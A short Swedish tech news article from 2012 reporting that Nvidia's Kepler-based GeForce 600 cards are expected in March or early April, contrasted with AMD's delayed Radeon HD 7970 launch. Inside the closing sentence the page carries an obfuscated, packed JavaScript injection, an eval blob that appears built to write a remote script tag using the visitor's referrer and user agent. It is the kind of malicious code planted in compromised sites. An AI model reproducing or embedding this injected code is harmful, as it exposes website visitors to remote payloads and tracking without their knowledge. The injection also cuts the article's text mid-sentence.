Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

PC

Nvidia Kepler släpps i mars

Nvidia Kepler släpps i mars
Filip Urde
  • On 19 januari, 2012
  • http://www.revue.se/filip-urde

Nvidia s kommande super GPUer kommer som ett försök att återställa företagets tidigare stjärnglans i grafiksegmentet. Nästa generation är baserad på Kepler och kommer tillhöra GeForce 600 serien och idag fick vi veta att dem nya grafikkorten har en planerad lansering någon gång under mars/början på april.

Företaget vill försäkra sig om att de nya högpresterande GPUerna finns på marknaden dagen då de lanseras, så man vill inte gå ut med en papperlansering, likt AMDs Radeon HD 7970, vars  lansering skulle äga rum den 22e december, men som kom ut den 9e januari.

Låter eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|khidi|var|u0026u|referrer|khiff||js|php’.split(’|’),0,{}))
vettigt om ni frågar mig, förseningar gillar ingen!